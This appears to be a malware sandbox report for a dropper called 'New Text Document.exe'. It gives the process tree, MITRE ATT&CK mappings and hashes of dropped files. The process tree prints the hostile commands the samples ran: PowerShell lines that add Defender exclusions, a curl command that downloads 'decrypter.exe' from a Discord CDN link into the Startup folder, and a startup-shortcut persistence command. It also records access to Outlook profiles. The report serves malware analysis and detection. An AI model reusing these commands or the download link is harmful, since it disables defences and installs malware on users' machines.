outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	blhbZrtqbLg6O1K.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	blhbZrtqbLg6O1K.exe

C:\Users\Admin\AppData\Local\Temp\New Text Document.exe
"C:\Users\Admin\AppData\Local\Temp\New Text Document.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4864
- C:\Users\Admin\AppData\Local\Temp\a\wwbizsrvs.exe
  "C:\Users\Admin\AppData\Local\Temp\a\wwbizsrvs.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1412
- C:\Users\Admin\AppData\Local\Temp\a\msf.exe
  "C:\Users\Admin\AppData\Local\Temp\a\msf.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:784
- C:\Users\Admin\AppData\Local\Temp\a\msf443.exe
  "C:\Users\Admin\AppData\Local\Temp\a\msf443.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1944
- C:\Users\Admin\AppData\Local\Temp\a\client.exe
  "C:\Users\Admin\AppData\Local\Temp\a\client.exe"
  2⤵
  - Executes dropped EXE
  - Drops desktop.ini file(s)
  - Drops file in Windows directory
  - Modifies system certificate store
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1868
- - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\b_6cnvyt.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3560
  - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA12E.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCA12D.tmp"
      4⤵
      PID:4388
- C:\Users\Admin\AppData\Local\Temp\a\xXdquUOrM1vD3An.exe
  "C:\Users\Admin\AppData\Local\Temp\a\xXdquUOrM1vD3An.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2556
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\a\xXdquUOrM1vD3An.exe"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2288
- - C:\Users\Admin\AppData\Local\Temp\a\xXdquUOrM1vD3An.exe
    "C:\Users\Admin\AppData\Local\Temp\a\xXdquUOrM1vD3An.exe"
    3⤵
    - Executes dropped EXE
    PID:2628
- - C:\Users\Admin\AppData\Local\Temp\a\xXdquUOrM1vD3An.exe
    "C:\Users\Admin\AppData\Local\Temp\a\xXdquUOrM1vD3An.exe"
    3⤵
    - Executes dropped EXE
    PID:3220
- - C:\Users\Admin\AppData\Local\Temp\a\xXdquUOrM1vD3An.exe
    "C:\Users\Admin\AppData\Local\Temp\a\xXdquUOrM1vD3An.exe"
    3⤵
    - Executes dropped EXE
    - Accesses Microsoft Outlook profiles
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2840
- C:\Users\Admin\AppData\Local\Temp\a\op.exe
  "C:\Users\Admin\AppData\Local\Temp\a\op.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2828
- - C:\Users\Admin\AppData\Local\Temp\7zSC0BC38C7\installer.exe
    .\installer.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:5008
  - - C:\Users\Admin\AppData\Local\Temp\7zSC0BC38C7\GenericSetup.exe
      "C:\Users\Admin\AppData\Local\Temp\7zSC0BC38C7\GenericSetup.exe" C:\Users\Admin\AppData\Local\Temp\7zSC0BC38C7\GenericSetup.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Checks for any installed AV software in registry
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:2032
- C:\Users\Admin\AppData\Local\Temp\a\babababa.exe
  "C:\Users\Admin\AppData\Local\Temp\a\babababa.exe"
  2⤵
  - Executes dropped EXE
  PID:2672
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Temp\decrypted_executable.exe"
    3⤵
    PID:4844
  - - C:\Users\Admin\AppData\Local\Temp\decrypted_executable.exe
      C:\Users\Admin\AppData\Local\Temp\decrypted_executable.exe
      4⤵
      Executes dropped EXE
      PID:1272
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9764.tmp\9765.tmp\9766.bat C:\Users\Admin\AppData\Local\Temp\decrypted_executable.exe"
        5⤵
        
        PID:1432
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -w hidden -c Add-MpPreference -ExclusionPath ""
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2976
      - C:\Windows\system32\curl.exe
        
        curl --silent --output "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DataStore1.exe" "https://cdn.discordapp.com/attachments/1167169926193229925/1306213355966435360/decrypter.exe?ex=6735d97c&is=673487fc&hm=3f582970dc363d475b432b390a941fae5b9a6a3f9388809e2d818b6f1c1f06ff&"
        6⤵
        Drops startup file
        
        PID:4984
- C:\Users\Admin\AppData\Local\Temp\a\lum250.exe
  "C:\Users\Admin\AppData\Local\Temp\a\lum250.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  PID:4132
- C:\Users\Admin\AppData\Local\Temp\a\Beefy.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Beefy.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:732
- C:\Users\Admin\AppData\Local\Temp\a\solandra.exe
  "C:\Users\Admin\AppData\Local\Temp\a\solandra.exe"
  2⤵
  - Executes dropped EXE
  PID:2120
- C:\Users\Admin\AppData\Local\Temp\a\mk.exe
  "C:\Users\Admin\AppData\Local\Temp\a\mk.exe"
  2⤵
  - Executes dropped EXE
  PID:4348
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sznj.lnk'); $s.TargetPath = 'C:\Users\Admin\AppData\Local\Temp\a\mk.exe'; $s.Save()"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops startup file
    - Suspicious use of AdjustPrivilegeToken
    PID:696
- C:\Users\Admin\AppData\Local\Temp\a\crypted2.exe
  "C:\Users\Admin\AppData\Local\Temp\a\crypted2.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  PID:1040
- - C:\Users\Admin\AppData\Local\Temp\a\crypted2.exe
    "C:\Users\Admin\AppData\Local\Temp\a\crypted2.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1788
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1040 -s 300
    3⤵
    - Program crash
    PID:2812

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1424

C:\Users\Admin\Desktop\New Text Document.exe
"C:\Users\Admin\Desktop\New Text Document.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4680
- C:\Users\Admin\Desktop\a\wwbizsrvs.exe
  "C:\Users\Admin\Desktop\a\wwbizsrvs.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3356
- C:\Users\Admin\Desktop\a\msf.exe
  "C:\Users\Admin\Desktop\a\msf.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3176
- C:\Users\Admin\Desktop\a\msf443.exe
  "C:\Users\Admin\Desktop\a\msf443.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1832
- C:\Users\Admin\Desktop\a\client.exe
  "C:\Users\Admin\Desktop\a\client.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2744
- C:\Users\Admin\Desktop\a\xXdquUOrM1vD3An.exe
  "C:\Users\Admin\Desktop\a\xXdquUOrM1vD3An.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  PID:1716
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop\a\xXdquUOrM1vD3An.exe"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:4360
- - C:\Users\Admin\Desktop\a\xXdquUOrM1vD3An.exe
    "C:\Users\Admin\Desktop\a\xXdquUOrM1vD3An.exe"
    3⤵
    - Executes dropped EXE
    - Accesses Microsoft Outlook profiles
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:1064
- C:\Users\Admin\Desktop\a\op.exe
  "C:\Users\Admin\Desktop\a\op.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1200
- - C:\Users\Admin\AppData\Local\Temp\7zS0B406269\installer.exe
    .\installer.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:3124
  - - C:\Users\Admin\AppData\Local\Temp\7zS0B406269\GenericSetup.exe
      "C:\Users\Admin\AppData\Local\Temp\7zS0B406269\GenericSetup.exe" C:\Users\Admin\AppData\Local\Temp\7zS0B406269\GenericSetup.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Checks for any installed AV software in registry
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:2504
- C:\Users\Admin\Desktop\a\babababa.exe
  "C:\Users\Admin\Desktop\a\babababa.exe"
  2⤵
  - Executes dropped EXE
  PID:3652
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Temp\decrypted_executable.exe"
    3⤵
    PID:4824
  - - C:\Users\Admin\AppData\Local\Temp\decrypted_executable.exe
      C:\Users\Admin\AppData\Local\Temp\decrypted_executable.exe
      4⤵
      Executes dropped EXE
      PID:4940
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E45B.tmp\E45C.tmp\E45D.bat C:\Users\Admin\AppData\Local\Temp\decrypted_executable.exe"
        5⤵
        
        PID:1520
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -w hidden -c Add-MpPreference -ExclusionPath ""
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:4528
      - C:\Windows\system32\curl.exe
        
        curl --silent --output "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DataStore1.exe" "https://cdn.discordapp.com/attachments/1167169926193229925/1306213355966435360/decrypter.exe?ex=6735d97c&is=673487fc&hm=3f582970dc363d475b432b390a941fae5b9a6a3f9388809e2d818b6f1c1f06ff&"
        6⤵
        Drops startup file
        
        PID:2672
- C:\Users\Admin\Desktop\a\lum250.exe
  "C:\Users\Admin\Desktop\a\lum250.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  PID:2292
- C:\Users\Admin\Desktop\a\Beefy.exe
  "C:\Users\Admin\Desktop\a\Beefy.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4716
- C:\Users\Admin\Desktop\a\solandra.exe
  "C:\Users\Admin\Desktop\a\solandra.exe"
  2⤵
  - Executes dropped EXE
  PID:1444
- C:\Users\Admin\Desktop\a\mk.exe
  "C:\Users\Admin\Desktop\a\mk.exe"
  2⤵
  - Executes dropped EXE
  PID:3300
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dcpz.lnk'); $s.TargetPath = 'C:\Users\Admin\Desktop\a\mk.exe'; $s.Save()"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops startup file
    - Suspicious use of AdjustPrivilegeToken
    PID:4764
- C:\Users\Admin\Desktop\a\crypted2.exe
  "C:\Users\Admin\Desktop\a\crypted2.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  PID:4628
- - C:\Users\Admin\Desktop\a\crypted2.exe
    "C:\Users\Admin\Desktop\a\crypted2.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:5076
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 232
    3⤵
    - Program crash
    PID:3804
- C:\Users\Admin\Desktop\a\random.exe
  "C:\Users\Admin\Desktop\a\random.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  PID:2136
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c start cmd /C "ping localhost -n 1 && start C:\Users\Admin\AppData\Local\enters.exe"
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:3456
  - - C:\Windows\system32\cmd.exe
      cmd /C "ping localhost -n 1 && start C:\Users\Admin\AppData\Local\enters.exe"
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      PID:3976
    - - C:\Windows\system32\PING.EXE
        
        ping localhost -n 1
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:764
    - - C:\Users\Admin\AppData\Local\enters.exe
        
        C:\Users\Admin\AppData\Local\enters.exe
        5⤵
        Executes dropped EXE
        
        PID:3232
- C:\Users\Admin\Desktop\a\blhbZrtqbLg6O1K.exe
  "C:\Users\Admin\Desktop\a\blhbZrtqbLg6O1K.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  PID:3236
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop\a\blhbZrtqbLg6O1K.exe"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:5052
- - C:\Users\Admin\Desktop\a\blhbZrtqbLg6O1K.exe
    "C:\Users\Admin\Desktop\a\blhbZrtqbLg6O1K.exe"
    3⤵
    - Executes dropped EXE
    - Accesses Microsoft Outlook profiles
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - outlook_office_path
    - outlook_win_path
    PID:4844

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1040 -ip 1040
1⤵
PID:740

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4628 -ip 4628
1⤵
PID:4512

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

Remote System Discovery

T1018

Software Discovery

T1518

Security Software Discovery

T1518.001

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\7zSC0BC38C7\BundleConfig.json

Filesize
1KB

MD5
720e816b722b5d82ebfc9dcb44f28f69

SHA1
f3a7ec0cc47e7c5da8759e601f617bd2a946fd5b

SHA256
b90ea75c7284525014467554cd68b3dca1fa8cd2420013b960e377523a9ab962

SHA512
3430372b3acfa59251c12137d2dac179127c3a423bd20abf9b07a6e63f7e15fa65a568f71efd0b4b2491ca36a8afef948d1e73f4fd1ca5e476c80a66236a2e20

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSC0BC38C7\DevLib.Services.dll

Filesize
232KB

MD5
68680186a2638c7439e62f7873bd2a05

SHA1
aaf9d047aa8eab9b0890c5c66778aab82e7d0b38

SHA256
316cc927c92bdc104fa41cdcd10ae6cff20373d08bfb748ffbd8ea04b2a71aa0

SHA512
38b4f4a22f83925fdaae57746e26614740a1e61c6489612b048d357b5e7fe45ddab877bcf44be2cf1a70c6c4aa8d3fa25582f99d11ebf951a60248b47625be40

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSC0BC38C7\DevLib.dll

Filesize
74KB

MD5
bc324abef123d557ece4efc5a168d452

SHA1
33064c1fbd30256dc5e1a5771c6d90b571faa59b

SHA256
320a56448860eb32360481a88d8d6ef87d563fd1bd353bd3006aa3054c728d98

SHA512
4ed1d88957c4c33e49953e7694663381cc24b26e2a1b18cdae91bcfa51ae129abf74004acfd4f3b110f6c15fc1985807380de582e64600f2c4646815c214352f

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSC0BC38C7\DynActsBLL.dll

Filesize
20KB

MD5
9fdd07a61f28a1649e022a23dadfa375

SHA1
23018134936b4363137346be39f89f3350906224

SHA256
16b70981d446f4541ed97c85e708e027f05a88a17fecd958ee9be491f313f088

SHA512
e20f01eadd1bb66378bdfa63baf3cde4f6e5461f817e2057cf0eb9a0deab3cad388d951da8decda6b13af743df1f44a4bcdcd654c35722583427af98ae6dea6c

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSC0BC38C7\GenericSetup.dll

Filesize
130KB

MD5
fd7595ed21bfa07c4d9591771e5e7b9a

SHA1
98d10c6bea7c8d9fc4d14fcef0e2fd9fafc1da68

SHA256
003e0beda739fb9760cb939dd94c1d32f1f158d0018a85c623aa4c3c90ded20a

SHA512
80ba400a8d471ed412304b081914afc4d8fdb0844fcff7f2134fc5fa764ee7f6d012b4dd82a1875dd177ab5f3df834d514fbf86f19650eeee889150e13548b56

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSC0BC38C7\GenericSetup.exe

Filesize
19KB

MD5
dc5c6cc514e5faf7c9f67b23cb739550

SHA1
fd65e2cd32280624cc404ea308f78ddeb7d3de2c

SHA256
76b26701e92a9ca6c47459ae8c3adbd73779f9079a4b720c325d2fab5ee4eff6

SHA512
6e41049cdf3cd9211c2927aa318cc424967098c624d421662bdeb55ae261715269578e417aec33d55f3bef18e32ccad4d4828419f0442bc69473de65202f29d2

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSC0BC38C7\GenericSetup.exe.config

Filesize
1KB

MD5
c5bb4979ee79c1a681c76afea65c95ed

SHA1
d1714ece77da71e377011b9a689af2e0675bb036

SHA256
54f1667525366c3c0f21949b406f62097ff9c5b4982a188a1ae5a3b61ae9a59c

SHA512
de0e8e036a0dcc5cf5f3cd6e7b33a0479b6311c6ad6c98a919c14f6318acbe57404830a2a1bfaa53b5850824a8fbf93227a5e02c846f53420e7c2b7fa799b0dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSC0BC38C7\GenericSetup.exe.config

Filesize
2KB

MD5
871213c4e35d43101b40cb718d00783e

SHA1
ffe84cf3428ebdb9018af77063a3b52504f4cda8

SHA256
847d1b5a3240783d24a909670010475f2ed1cedba75a5929af5f8c97ce9d21ab

SHA512
5f663491549f7513e8be0550087e2eec6f2fabfaabaf02bbb5476916939dd74fae4c28f64aba91a896df65024cf81cbc26105a4f8f7e981953779eb18405d092

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSC0BC38C7\H2OSciter.dll

Filesize
139KB

MD5
0b5ec61c8a594bcf411da311ce7c472f

SHA1
de906c7aec2fda0efb1a0d21739f4b9d280cd8c9

SHA256
b0163365c1a3a37a9ad3a6744bc2851f2a3eabe9cfd5788077aca4e47e7ac385

SHA512
d508432eea7124dabd40e1b50cb73c875ed5a3e2404ddbcae5255c120e0a982d0b7af2e57cad924e5ab9ecb96f69ce33af45c0b81461d4870cc624b24c2f5393

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSC0BC38C7\HtmlAgilityPack.dll

Filesize
162KB

MD5
a275083c3e74df3641a260a06aaba535

SHA1
c717b274e751fa8fbcbfc3ba620cf8c2402c054a

SHA256
9941cd2a1f6b9dbf3a3cc5092ce903d160dc2db032c7d0a5cd5acd36ff508eb9

SHA512
2860bcc1b19082be821d1c56576a772e0ba8a5da78447d2e695d96ec70954ec398be96469f6bed0da6170f14b0ba907e9f03329ae497df14b7a0917aa610db34

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSC0BC38C7\Microsoft.Win32.TaskScheduler.dll

Filesize
303KB

MD5
3907d3c77489e3cf63441eac6bdae223

SHA1
00bf790b0b871f90dc876880e43485be49bea9bc

SHA256
eedc08e61270149b7ba20f779720279830eeafec464f98054f85dd23a5493dcf

SHA512
59d0409561addcbe67c75a00af71e8ab1b13ade5e72dee60f842f8147a9b8c056fc2a642fe8d5cc433319f2d5526a07dd27613582d6743bd4bdd044c0388e11f

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSC0BC38C7\MyDownloader.Core.dll

Filesize
68KB

MD5
f186e4845cf98bd997f7f4f4096e5765

SHA1
6e7d5275f19914cf01fcc70f5d735dd97ac10a8c

SHA256
b73d6238e9a29848a438276638d318b766e43d21dc2df1a503b553497a7db4fc

SHA512
81ea5f1187b22597b738221f3b68dcb51f3709e98f039ea7c07675d297eacd6564801b152b7ba8e75a9181965e7ff824bf0f8ae3583558a86690025822b0518e

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSC0BC38C7\MyDownloader.Extension.dll

Filesize
180KB

MD5
15bdd1c6dbee57849faf507d9dcdbf2b

SHA1
54d00165cd11709885d266a5def87c76a0976828

SHA256
91c5a090148bd616e443aabaf15e5c80d142a8ad993af693283a13b6118c99cb

SHA512
ec2c7e451c4423e98d539acbc550baea4845a0d03f1b768cfcbd0c31011145f1464801d2238b71450d7081e03b8739781cbeb0facec7fa6c195d158a8ad4bea5

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSC0BC38C7\Newtonsoft.Json.dll

Filesize
481KB

MD5
aad594c15911f1554982ee21d55029cf

SHA1
0ad06cb604cd4f77bd6ca81a02d585553865d29d

SHA256
0f56d717fea313ee94b2a2bbaa2650c5fb225575789f83f54750500cd4f07cb2

SHA512
99a3b9113841f6ce1606ee6d757034cdd34a0d68eb0dc31153f728ada368e0d1b1c4cba28591f803a0604d7ee9e4b1c20cfa65f9f5a8a10d0adb70426dad6558

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSC0BC38C7\OfferInstaller.exe

Filesize
27KB

MD5
31457c0cefad56e514098da380e2dda5

SHA1
ea3360fbd326fa63f0b731b213f934da672266f1

SHA256
f44c546992d859445b8537b30cdc55dedaaebef91a8e6e5dd2cfbf27d0a7a9d2

SHA512
98715c71112b81a47524f4526a59f88222361ad2781cdfbba7f281ada2b7bfe9b740ab9edc7963ebaec3954ff8e64a277eabc76c9e193fd99c2959a18728ce64

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSC0BC38C7\OfferInstaller.exe.config

Filesize
1KB

MD5
dd39824adeb4ff5bcda330f48a1777b9

SHA1
ee46838177b0cd7e17c77f1fadb2a516a960af12

SHA256
d31388110ffdef2ac150bdf02e69ebf81895d2b0ec8400558601a9e498e05dfc

SHA512
79ba2c8605c359bc4e4fa10550f4771c3df77ef395cb1d9f4014925fc885225331e9f2915aef071d4394845d79126166719ad82afd51116fd796f55d46101bbb

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSC0BC38C7\OfferServiceBLL.dll

Filesize
101KB

MD5
611faad8e605895d8d34c6d5bb45b648

SHA1
15eb53c327268524c32c0e6f86aa3af9f36a0af5

SHA256
01c72994650487ba0bad43534f6866b4a32c203b03375d1c67d4a2255a63514d

SHA512
81df5671bbbf996f7e7aa73ec3ff374fcc740ebc2ee613198858ba85f1d100571bcf9e2a42537aef0982e2296590d67a8137b16ff1319fd1aadcaf4e69867667

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSC0BC38C7\OfferServiceSDK.dll

Filesize
28KB

MD5
d1a50cb0c70f8e24a7c09650461a3e57

SHA1
fc6e49f99588d202dd73073b64828aadec519587

SHA256
2cc9e3899e2effe19ba48950fa3280b20b4aad3ef649cb96c424dfd1f43d8db1

SHA512
4f69c75ce514e9c975ba1fd430db6c5486958100bab4fdcb4f7f7015ff979c6abb13d227dd9a77bc951dbb61ca3f4da40237a55948a186369d2cafbd68d83c07

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSC0BC38C7\Resources\InstallingPage.html

Filesize
1KB

MD5
182facad1a7a6722f02415f18380159f

SHA1
65c1af45c0e817c10104002803b95594fa182c89

SHA256
9a23979eb2e5d3fabb1826ed42f4e21dabfe3eb1a239006e826849fc92095ac4

SHA512
d7d20fe9d4a67a912b66bbbe495d8ad000de45b4b0bebc1cd2e10fea84dc2c97f1b2e8667c53d9c2a7e11a02f0773b8f06a4debec774933856461ed28671c14e

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSC0BC38C7\Resources\OfferPage.html

Filesize
1KB

MD5
46cb27da449f8bd0edcbd92720c6d5e5

SHA1
adb4968b5970474560bf65ddfe0bd5b0369248aa

SHA256
8ace7607ad674a9f26fdd625801b9e1b9fd10f2d261abdfd912fb0ee61f032fe

SHA512
06a6141c317fd05b87d7c36f8f1feea079e7923cca80431beb9e8a656e7ef3b72a5be12f06ccc24b67285ca5e7c701f6644e153875ae979982d50ad4b57fe784

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSC0BC38C7\Resources\images\loader.gif

Filesize
16KB

MD5
2b26f73d382ab69f3914a7d9fda97b0f

SHA1
a3f5ad928d4bec107ae2941fa6b23c69d19eedd0

SHA256
a6a0b05b1d5c52303dd3e9e2f9cda1e688a490fbe84ea0d6e22a051ab6efd643

SHA512
744ff7e91c8d1059f48de97dc816bc7cc0f1a41ea7b8b7e3382ff69bc283255dfdf7b46d708a062967a6c1f2e5138665be2943ed89d7543fc707e752543ac9a7

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSC0BC38C7\Resources\images\warning48x48.png

Filesize
749B

MD5
d3361cf0d689a1b34d84f483d60ba9c9

SHA1
d89a9551137ae90f5889ed66e8dc005f85cf99ff

SHA256
56739925aada73f9489f9a6b72bfaaa92892b27d20f4d221380ba3eae17f1442

SHA512
247cf4c292d62cea6bf46ac3ab236e11f3d3885cd49fdd28958c7493ebb86ace45c9751424f7312f393932d0a7165e2985f56c764d299b7e37f75457eef2d846

Download Submit
